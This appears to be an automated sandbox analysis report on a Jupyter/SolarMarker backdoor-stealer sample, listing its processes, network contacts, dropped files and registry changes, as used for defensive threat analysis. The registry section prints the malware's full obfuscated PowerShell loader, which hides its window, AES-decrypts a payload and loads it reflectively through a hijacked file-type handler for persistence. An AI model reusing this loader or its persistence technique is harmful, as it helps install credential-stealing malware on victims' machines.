Malware Analysis Report

2024-10-24 18:08

Sample ID 220613-aa4h5agfc9
Target ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.7z
SHA256 e864d8d2a93f38d2714ad1f0b5f79cef79d46022cd6b29c3ed8e52c8c79e7ff9
Tags
jupyter backdoor stealer suricata trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e864d8d2a93f38d2714ad1f0b5f79cef79d46022cd6b29c3ed8e52c8c79e7ff9

Threat Level: Known bad

The file ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.7z was found to be: Known bad.

Malicious Activity Summary

jupyter backdoor stealer suricata trojan

Jupyter, SolarMarker

suricata: ET MALWARE Jupyter Stealer CnC Checkin

Jupyter family

Blocklisted process makes network request

Drops startup file

Program crash

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2022-06-13 00:02

Signatures

Jupyter family

jupyter

Analysis: behavioral1

Detonation Overview

Submitted

2022-06-13 00:01

Reported

2022-06-13 00:08

Platform

win10-20220414-en

Max time kernel

138s

Max time network

298s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe"

Signatures

Jupyter, SolarMarker

backdoor trojan stealer jupyter

suricata: ET MALWARE Jupyter Stealer CnC Checkin

suricata

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QhGywHLreAszXutEwsWWihf.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell\open\command C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell\open C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell\open\command\ = "powershell -command \"$showWindowAsync=Add-Type -MemberDefinition ('['+'D'.ToUpper()+'ll'.ToLower()+'I'.ToUpper()+'mport('.ToLower()+[char]0x22+'user32.dll'.ToLower()+[char]0x22+')]public static extern bool '.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync('.ToLower()+'I'.ToUpper()+'nt'.ToLower()+'P'.ToUpper()+'tr hWnd, int nCmdShow);'.ToLower()) -Name ('W'.ToUpper()+'in32'.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync'.ToLower()) -Namespace Win32Functions -PassThru;$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0);$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('9Qw7HmyNbXwDhTl1BCWQ9HiCHVJ6biS29AI3joRqFsE=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\AppData\\Local\\Temp\\pVbWJYZDDCSHJ\\YmZzDuyJLaoZWFP.KQCAccTWwYOdCobshuYIIWjvAgPA'));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[WMjltFazGzRYICFIoq5XoJDM1T0sO959lZpC3tdMx9r6rF4.aOQnwFCqXLWVnkObggxLLxB9CQD8t3NAI8E_o_VOjfEb3SskE3Fab05w_MOsLyIbBovKJMjkKSlk9pTjBqWv]::RRye6ZIFpv7n8DDuAo9IugHH9lFCZ();\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\.kqcacctwwyodcobshuyiiwjvagpa C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\.kqcacctwwyodcobshuyiiwjvagpa\ = "znmroizkuvzkfkiogetiwusss" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe

"C:\Users\Admin\AppData\Local\Temp\ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m2slr0sk\m2slr0sk.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5E80.tmp" "c:\Users\Admin\AppData\Local\Temp\m2slr0sk\CSCA8B179817ABA4314ACF645DDFC6D16A1.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2932 -s 944

Network

Country Destination Domain Proto
RO 37.120.247.120:80 37.120.247.120 tcp
US 8.238.20.126:80 tcp

Files

memory/2932-114-0x0000000000720000-0x0000000001720000-memory.dmp

memory/4040-115-0x0000000000000000-mapping.dmp

memory/4040-121-0x000002122E240000-0x000002122E262000-memory.dmp

memory/4040-142-0x000002122E3E0000-0x000002122E41C000-memory.dmp

memory/4040-153-0x000002122E8F0000-0x000002122E966000-memory.dmp

memory/4340-230-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\m2slr0sk\m2slr0sk.cmdline

MD5 1eeb07bec0c50ea3fde3eb7ebbf2696c
SHA1 9ab2dc69969b2b3567978960338ed5fb4bbdba06
SHA256 377c3d45039c7df67f3e1779059c0aceb6be66e4a97c745e956840d005fe16b4
SHA512 f0bcd40d1bfc147c367dd8660f95780c4cae5df7f85fb161270e70029d9e4e9f4c3fa4f826cd286ce366361f41d755f28781d10a3a3300166cd8bc286b10c626

\??\c:\Users\Admin\AppData\Local\Temp\m2slr0sk\m2slr0sk.0.cs

MD5 2f9b4948ac0b26204994e246094a9f5d
SHA1 9870e53ad61eba593a2074d2a30202f7e3df09f7
SHA256 def6ec20884e30f8689cb1ccb8fb62735db528c5277f52f64ecae170cfd49776
SHA512 ef5f9056b36c8f9204a65b26244f225a9c2cc3bf5b1c46055e6eda06e63769243538b568b29627eb497289777fa69468e64b5eae0fb666bbb2e432a3059154d1

memory/3708-233-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\m2slr0sk\CSCA8B179817ABA4314ACF645DDFC6D16A1.TMP

MD5 1c11d3ae5fd77a79312b6c30d0a66553
SHA1 96bf5d3745727569a87594103400b107da643152
SHA256 9956ebc42062cb7aa5317cb483dc43b4ae186ccb41cd7b57a7ef22b0abe9a7d9
SHA512 bc137488d97f6bfe6cbd5107c23d3b497e0b2618c5a78b8c4eb3f0946cb13dcbc516b869446710e8f25be5cad2d0c319302d7edf2d5f4b171ac12ef436ccb239

C:\Users\Admin\AppData\Local\Temp\RES5E80.tmp

MD5 7323216a4b3cb72a8e4b9e18769a63d7
SHA1 e35e0b917b06e1bc586d031a5e27cdec42db5c17
SHA256 1fd38a3bedb9b5e4337d8834eb2d1cfd87618959b92898accd49241b737bc900
SHA512 54ae2c3fa700a400973cc3ad437bfa4c359dccddfcf9012921bc598dde0aa513f44047793018fc75e3159dbfb5a171a6a2f40a6a39dfbc44e69800a8eed2eaab

C:\Users\Admin\AppData\Local\Temp\m2slr0sk\m2slr0sk.dll

MD5 e2fc3e1ad6b1857e10377afba34315a2
SHA1 b8b239cb809359e0d9893fe993cbf5fe3076cd91
SHA256 f8c6fb96d781568e280d1c524b63a1932d7abbec6fc8558f6b2959ba360758dd
SHA512 7adc76e3c25c01c4786433f9d76c4b4876165ca455192847077e673c90731d9b741d87962961b7c31f72dd2afdb7729b743143968b90f171d48cdedb8c2848a3

memory/4040-237-0x000002122E3B0000-0x000002122E3B8000-memory.dmp

memory/4368-329-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 2143b379fed61ab5450bab1a751798ce
SHA1 32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e
SHA256 a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81
SHA512 0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

memory/4040-383-0x000002122E970000-0x000002122EA34000-memory.dmp